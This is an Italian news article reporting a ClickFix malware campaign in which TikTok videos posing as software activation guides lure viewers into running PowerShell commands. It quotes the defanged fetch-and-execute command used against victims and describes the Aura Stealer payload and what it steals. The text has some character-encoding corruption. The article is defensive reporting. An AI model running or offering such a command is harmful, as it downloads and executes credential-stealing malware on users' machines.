Una nuova campagna di attacchi ClickFix sta sfruttando video pubblicati su TikTok per distribuire malware in grado di rubare informazioni sensibili dagli account degli utenti. I video si presentano come guide gratuite per attivare software popolari come Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro. Si tratta quindi di una vera e propria campagna di phishing.
Come funziona l’attacco su TikTok
Le clip condivise nascondono un attacco di social engineering mirato a spingere le vittime ad eseguire comandi PowerShell malevoli. L’istruzione tipica mostrata nei video รจ:
iex (irm slmgr[.]win/photoshopA seconda del software imitato, il nome all’interno dellโURL varia (ad esempio windows o spotify). L’esecuzione del comando collega il sistema ad un dominio controllato dagli attaccanti (slmgr[.]win) che scarica script PowerShell aggiuntivi e due eseguibili dannosi.
Il primo file, updater.exe, รจ una variante del malware Aura Stealer, specializzato nel furto di credenziali salvate nei browser, cookie di autenticazione, chiavi di wallet di criptovalute e dati di accesso ad applicazioni desktop. Una volta eseguito, il malware invia queste informazioni ai server dei cybercriminali e permette l’accesso remoto agli account compromessi.
Un secondo componente, source.exe, viene poi scaricato e compilato localmente tramite il compilatore .NET (csc.exe) per l’iniezione e l’esecuzione di codice malevolo direttamente in memoria. La funzione esatta di questo payload non รจ stata perรฒ ancora chiarita.
Come difendersi dagli attacchi ClickFix
Gli esperti raccomandano a chiunque abbia assistito all’esecuzione di istruzioni simili di cambiare immediatamente tutte le password. Gli attacchi ClickFix sono sempre piรน diffusi e utilizzati per distribuire ransomware e malware mirati al furto di criptovalute.
Come regola generale, gli utenti dovrebbero evitare di copiare comandi da fonti non verificate ed eseguirli su PowerShell, Terminale o Prompt dei comandi, anche quando provengono da piattaforme apparentemente affidabili come TikTok.
Per restare sempre aggiornato seguici su Google News!
